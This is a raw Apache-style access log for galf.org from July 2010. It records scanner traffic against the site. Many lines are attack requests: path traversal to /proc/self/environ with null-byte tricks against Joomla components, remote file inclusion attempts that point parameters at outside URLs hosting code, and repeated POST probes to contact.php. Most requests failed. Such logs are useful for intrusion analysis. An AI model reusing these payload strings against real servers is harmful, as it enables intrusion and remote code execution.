67.195.115.245 - - [25/Jul/2010:19:03:54 -0700] "GET /logs/access_100524.log HTTP/1.0" 200 9085671 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:19:04:04 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:19:04:05 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:19:04:20 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:19:04:20 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:19:04:25 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:19:04:25 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:19:05:37 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:19:05:37 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:40 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:40 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:41 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:41 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:19:05:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:19:12:00 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:19:12:00 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:19:12:01 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:12:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:12:15 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:12:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:13:30 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:13:31 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:13:33 -0700] "GET /logs/access_100301.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:13:37 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:13:38 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:13:38 -0700] "GET /logs/access_100301.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:13:58 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:13:58 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:13:58 -0700] "GET /logs/access_100301.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:14:11 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:14:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:14:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:14:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:19:14:20 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:19:14:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:14:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:14:35 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:14:35 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:19:14:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:19:14:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:19:14:54 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:15:08 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:15:08 -0700] "POST /logs/contact.php HTTP/1.0" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:15:09 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:15:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:15:09 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:15:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:15:09 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:19:15:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:15:34 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:15:34 -0700] "GET /logs/access_091228.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:15:34 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:15:41 -0700] "GET /logs/access_091102.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:42 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:43 -0700] "GET /logs/access_070820.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "galf.org"
125.141.91.138 - - [25/Jul/2010:19:15:43 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:15:43 -0700] "GET /playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:15:43 -0700] "GET /logs/access_091102.log%20%20/playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:46 -0700] "GET /logs/access_080317.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:47 -0700] "GET /logs/access_080421.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:49 -0700] "GET /logs/access_080714.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:50 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "www.galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:51 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "www.galf.org"
211.169.249.251 - - [25/Jul/2010:19:15:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
211.169.249.251 - - [25/Jul/2010:19:15:51 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
211.169.249.251 - - [25/Jul/2010:19:15:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:52 -0700] "GET /labia HTTP/1.1" 301 89 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:15:53 -0700] "GET /logs/access_091228.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:15:53 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:15:53 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:54 -0700] "GET /labia/ HTTP/1.1" 200 524 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "www.galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:56 -0700] "GET /logs/access.log HTTP/1.1" 200 138569 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:15:57 -0700] "GET /logs/access_091102.log%20%20/playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:15:58 -0700] "GET /playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:15:58 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.115.166.11 - - [25/Jul/2010:19:15:59 -0700] "GET /logs/access_081110.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:19:16:00 -0700] "GET /logs/access_091102.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.115.166.11 - - [25/Jul/2010:19:16:01 -0700] "GET /logs/access_090420.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:16:01 -0700] "GET /logs/access_091102.log%20%20/playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:16:01 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:16:01 -0700] "GET /playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:16:46 -0700] "GET /logs/access_100524.log%20%20/playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:17:08 -0700] "GET /logs/access_100524.log%20%20/playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:19:17:10 -0700] "GET /logs/access_100524.log%20%20/playing.php/common/db.php?commonpath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:19:17:58 -0700] "GET /logs/errors.php?error=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:19:17:58 -0700] "GET /errors.php?error=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:19:17:58 -0700] "GET /logs/access_091207.log/errors.php?error=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:17:58 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:17:58 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:18:00 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:19:18:00 -0700] "GET /logs/access_091130.log/errors.php?error=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:29 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:29 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:29 -0700] "POST /logs/access_100510.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:29 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:29 -0700] "POST /logs//contact.php HTTP/1.0" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:29 -0700] "POST /logs/access_100510.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:29 -0700] "POST /logs/access_091019.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:29 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:29 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:30 -0700] "POST /logs/access_100510.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:30 -0700] "POST /logs/access_091019.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:30 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:30 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:30 -0700] "POST /logs/access_100510.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:30 -0700] "POST /logs/access_091019.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:19:18:30 -0700] "POST /logs/access_091019.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:19:18:54 -0700] "GET /logs/access_091130.log/errors.php?error=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:19:18:54 -0700] "GET /logs/access_091207.log/errors.php?error=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:19:18:54 -0700] "GET /errors.php?error=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:19:18:54 -0700] "GET /logs/errors.php?error=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:19:19:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:19:19:07 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:19:19:08 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:19:49 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:19:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:19:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:19:53 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:19:53 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:19:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:19:58 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:19:58 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:19:19:58 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:48 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:48 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:48 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:48 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:49 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
